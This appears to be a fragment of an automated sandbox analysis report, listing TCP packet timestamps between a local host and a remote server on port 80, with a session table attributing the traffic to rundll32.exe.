Apr 22, 2022 18:13:05.159192085 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159205914 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159214973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159240007 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.159265995 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.159432888 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159456015 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159483910 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.159511089 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.181787014 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.181935072 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.197417974 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.197562933 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.205602884 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205634117 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205652952 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205677986 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205703020 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205718994 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205789089 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.205816984 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205845118 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205862999 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205948114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205974102 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.205990076 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206072092 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206149101 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206156969 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206190109 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206216097 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206250906 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206275940 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206291914 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206293106 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206315994 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206317902 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206341028 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206351995 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206358910 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206378937 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206432104 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206470966 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206485987 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206501961 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206521988 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206629038 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206650972 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.206676960 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.206701994 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.237756014 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.237782001 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.237795115 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.237812042 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.237824917 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238147974 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238188028 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238202095 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238312960 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238327026 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238668919 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.238759041 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238778114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238800049 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238831043 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.238847971 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238854885 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.238881111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238888979 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.238892078 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238909960 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238914967 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.238951921 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.238976002 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.238990068 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239012957 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.239213943 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239250898 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239253998 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.239270926 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239288092 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.239394903 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239419937 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239434958 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.239451885 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239458084 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.239681005 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239698887 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239711046 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239723921 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.239748955 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.239753962 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.239784002 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.383399010 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.407381058 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.762598991 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.762626886 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.762712002 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:14:07.096249104 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49773 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 22, 2022 18:13:03.616503954 CEST | 653 | OUT | |
Apr 22, 2022 18:13:03.994354963 CEST | 654 | IN |